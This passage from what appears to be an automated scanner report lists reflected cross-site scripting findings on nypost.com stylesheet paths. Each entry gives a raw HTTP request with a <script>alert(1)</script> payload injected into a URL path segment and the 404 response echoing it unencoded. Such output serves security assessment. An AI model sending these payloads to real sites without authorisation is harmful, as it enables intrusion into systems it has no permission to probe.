Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:00 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig6cc6e<script>alert(1)</script>ae37078603d/WebPortal/nypost/blocks/hat/hat.css</p>
...[SNIP]...

1.222. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4965a<script>alert(1)</script>4ae16c0be26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal4965a<script>alert(1)</script>4ae16c0be26/nypost/blocks/hat/hat.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:02 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal4965a<script>alert(1)</script>4ae16c0be26/nypost/blocks/hat/hat.css</p>
...[SNIP]...

1.223. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 31704<script>alert(1)</script>d39de5160d8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost31704<script>alert(1)</script>d39de5160d8/blocks/hat/hat.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:04 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost31704<script>alert(1)</script>d39de5160d8/blocks/hat/hat.css</p>
...[SNIP]...

1.224. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bd485<script>alert(1)</script>193890173be was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocksbd485<script>alert(1)</script>193890173be/hat/hat.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:10 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocksbd485<script>alert(1)</script>193890173be/hat/hat.css</p>
...[SNIP]...

1.225. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8c6a7<script>alert(1)</script>545a2c5be11 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/hat8c6a7<script>alert(1)</script>545a2c5be11/hat.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:11 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/hat8c6a7<script>alert(1)</script>545a2c5be11/hat.css</p>
...[SNIP]...

1.226. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 65850<script>alert(1)</script>b4a82bde358 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css65850<script>alert(1)</script>b4a82bde358 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css65850<script>alert(1)</script>b4a82bde358</p>
...[SNIP]...

1.227. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e0bb<script>alert(1)</script>341c7e99cf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig4e0bb<script>alert(1)</script>341c7e99cf/WebPortal/nypost/blocks/hot_topics/hot_topics.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 724
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:07 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig4e0bb<script>alert(1)</script>341c7e99cf/WebPortal/nypost/blocks/hot_topics/hot_topics.css</p>
...[SNIP]...

1.228. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 208e3<script>alert(1)</script>315a306eca7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal208e3<script>alert(1)</script>315a306eca7/nypost/blocks/hot_topics/hot_topics.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:12 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal208e3<script>alert(1)</script>315a306eca7/nypost/blocks/hot_topics/hot_topics.css</p>
...[SNIP]...

1.229. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 97698<script>alert(1)</script>52bff809a2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost97698<script>alert(1)</script>52bff809a2/blocks/hot_topics/hot_topics.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 724
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:15 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost97698<script>alert(1)</script>52bff809a2/blocks/hot_topics/hot_topics.css</p>
...[SNIP]...

1.230. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1ba05<script>alert(1)</script>1ec9bb3b14c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks1ba05<script>alert(1)</script>1ec9bb3b14c/hot_topics/hot_topics.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:17 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks1ba05<script>alert(1)</script>1ec9bb3b14c/hot_topics/hot_topics.css</p>
...[SNIP]...

1.231. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4dc7a<script>alert(1)</script>f0b6cfcc4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics4dc7a<script>alert(1)</script>f0b6cfcc4/hot_topics.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:20 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics4dc7a<script>alert(1)</script>f0b6cfcc4/hot_topics.css</p>
...[SNIP]...

1.232. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload a7a6c<script>alert(1)</script>4dabacaeab7 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.cssa7a6c<script>alert(1)</script>4dabacaeab7 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.cssa7a6c<script>alert(1)</script>4dabacaeab7</p>
...[SNIP]...

1.233. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c5c5f<script>alert(1)</script>f09d03ad0c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfigc5c5f<script>alert(1)</script>f09d03ad0c/WebPortal/nypost/blocks/markets/markets.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 718
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:28 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfigc5c5f<script>alert(1)</script>f09d03ad0c/WebPortal/nypost/blocks/markets/markets.css</p>
...[SNIP]...

1.234. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 879fd<script>alert(1)</script>3721b0ad5ba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal879fd<script>alert(1)</script>3721b0ad5ba/nypost/blocks/markets/markets.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:30 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal879fd<script>alert(1)</script>3721b0ad5ba/nypost/blocks/markets/markets.css</p>
...[SNIP]...

1.235. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4b7f5<script>alert(1)</script>15074911464 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost4b7f5<script>alert(1)</script>15074911464/blocks/markets/markets.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:32 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost4b7f5<script>alert(1)</script>15074911464/blocks/markets/markets.css</p>
...[SNIP]...

1.236. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1912c<script>alert(1)</script>f29ff77d1e2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks1912c<script>alert(1)</script>f29ff77d1e2/markets/markets.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:37 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks1912c<script>alert(1)</script>f29ff77d1e2/markets/markets.css</p>
...[SNIP]...

1.237. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9dbf8<script>alert(1)</script>5b449c7fdd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/markets9dbf8<script>alert(1)</script>5b449c7fdd/markets.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 718
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:39 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/markets9dbf8<script>alert(1)</script>5b449c7fdd/markets.css</p>
...[SNIP]...

1.238. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3a03b<script>alert(1)</script>7e857a3241b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css3a03b<script>alert(1)</script>7e857a3241b HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:41 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css3a03b<script>alert(1)</script>7e857a3241b</p>
...[SNIP]...

1.239. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7b225<script>alert(1)</script>0d0497a7126 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig7b225<script>alert(1)</script>0d0497a7126/WebPortal/nypost/blocks/media_nav/media_nav.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
